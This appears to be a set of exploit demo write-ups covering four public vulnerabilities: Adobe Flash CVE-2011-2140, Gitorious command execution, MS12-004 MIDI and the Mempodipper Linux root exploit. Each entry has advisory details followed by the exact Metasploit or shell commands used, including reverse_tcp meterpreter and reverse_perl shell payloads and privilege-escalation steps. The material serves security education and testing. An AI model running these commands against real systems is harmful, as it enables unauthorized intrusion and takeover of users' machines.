CVE-2011-2140 Adobe Flash Player MP4 Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability reported to ZDI by Anonymous
Vulnerability reported to the vendor by ZDI the 2011-02-10
Coordinated public release of the vulnerability the 2011-08-23
Vulnerability reported exploited in the wild in November 2011
First PoC provided by Abysssec the 2012-01-31
Metasploit PoC provided the 2012-02-10

PoC provided by :

Alexander Gavrun
Abysssec
sinn3r

Reference(s) :

CVE-2011-2140
OSVDB-74439
ZDI-11-276
APSB11-21

Affected version(s) :

Adobe Flash Player 10.3.181.36 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems.

Tested on Windows XP Pro SP3 with :

Adobe Flash Player 10.3.181.34
Longtail SWF Player
Internet Explorer 7

Description :

This module exploits a vulnerability found in Adobe Flash Player’s Flash10u.ocx component. When processing a MP4 file (specifically the Sequence Parameter Set), Flash will see if pic_order_cnt_type is equal to 1, which sets the num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in offset_for_ref_frame on the stack, which allows arbitrary remote code execution under the context of the user. Numerous reports also indicate that this vulnerability has been exploited in the wild. Please note that the exploit requires a SWF media player in order to trigger the bug, which currently isn’t included in the framework. However, software such as Longtail SWF Player is free for non-commercial use, and is easily obtainable.

Commands :

use exploit/windows/browser/adobe_flash_sps
set SRVHOST 192.168.178.100
set SWF_PLAYER_URI http://192.168.178.100/mediaplayer/player.swf
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

OSVDB-78480 Gitorious Arbitrary Command Execution Metasploit Demo

Exploits, Metasploit

Timeline :

Vulnerability reported to the vendor by joernchen the 2012-01-17
Coordinated public release of the vulnerability the 2012-01-27
Metasploit PoC provided the 2012-01-19

PoC provided by :

joernchen

Reference(s) :

OSVDB-78480

Affected version(s) :

Gitorious before or equal to version 2.1.0

Tested on Ubuntu 11.10 with :

Gitorious 2.1.0

Description :

This module exploits an arbitrary command execution vulnerability in the in gitorious. Unvalidated input is send to the shell allowing command execution.

Commands :

use exploit/multi/http/gitorious_graph
set RHOST 192.168.178.115
set URI /myproject/myproject
SET PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.100
exploit

uname -a
id

MS12-004 Windows Media Remote Code Execution Metasploit Demo

Exploits, Metasploit,

Timeline :

Vulnerability discovered and reported to the vendor by Shane Garrett
Coordinated public release of the vulnerability the 2012-01-10
Vulnerability exploited in the wild
Metasploit PoC provided the 2012-01-27

PoC provided by :

Shane Garrett
juan vazquez
sinn3r

Reference(s) :

MS12-004
CVE-2012-0003
OSVDB-78210
Trend Micro Blog Post

Affected version(s) :

Windows XP SP3
Windows XP Media Center Edition 2005 SP3
Windows XP Professional x64 Edition SP2
Windows Server 2003 SP2
Windows Server 2003 x64 Edition SP2
Windows Vista SP2
Windows Vista x64 Edition SP2
Windows Server 2008 for 32-bit Systems SP2
Windows Server 2008 for x64-based Systems SP2
Windows 7 for 32-bit Systems and Windows 7 for 32-bit SP1
Windows 7 for x64-based Systems and Windows 7 for x64-based Systems SP1
Windows Server 2008 R2 for x64-based Systems and Windows Server 2008 R2 for x64-based SP1

Tested on Windows XP SP3 with :

winmm.dll 5.1.2600.5512

Description :

This module exploits a heap overflow vulnerability in the Windows Multimedia Library (winmm.dll). The vulnerability occurs when parsing specially crafted MIDI files. Remote code execution can be achieved by using Windows Media Player’s ActiveX control. Exploitation is done by supplying a specially crafted MIDI file with specific events, causing the offset calculation being higher than how much is available on the heap (0x400 allocated by WINMM!winmmAlloc), and then allowing us to either “inc al” or “dec al” a byte. This can be used to corrupt an array (CImplAry) we setup, and force the browser to confuse types from tagVARIANT objects, which leverages remote code execution under the context of the user. At this time, for IE 8 target, JRE (Java Runtime Environment) is required to bypass DEP (Data Execution Prevention). Note: Based on our testing, the vulnerability does not seem to trigger when the victim machine is operated via rdesktop.

Commands :

use exploit/windows/browser/ms12_004_midi
set SRVHOST 192.168.178.100
SET PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

CVE-2012-0056 Mempodipper Linux Local Root Exploit Demo

Exploits,

Timeline :

Vulnerability discovered by zx2c4 (Jason A. Donenfeld)
Public release of the vulnerability the 2012-01-18
Exploit provided the 2012-01-23

PoC provided by :

zx2c4 (Jason A. Donenfeld)

Reference(s) :

CVE-2012-0056
EBD-ID-18411

Affected version(s) :

Linux kernel’s above or equal to 2.6.39 (32 bit or 64 bit).

Tested on Ubuntu 11.10 with :

Linux ubuntu 3.0.0-15-generic

Description :

Mempodipper is an exploit for CVE-2012-0056 exploiting an issue in the handling of the /proc/pid/mem writing functionality, where permissions are not being properly checked in the Linux kernel version 2.6.39 to current. A local, unprivileged user could use this flaw to escalate their privileges.

Commands :

whoami
gcc -o CVE-2012-0056-Mempodipper CVE-2012-0056-Mempodipper.c
./CVE-2012-0056-Mempodipper
whoami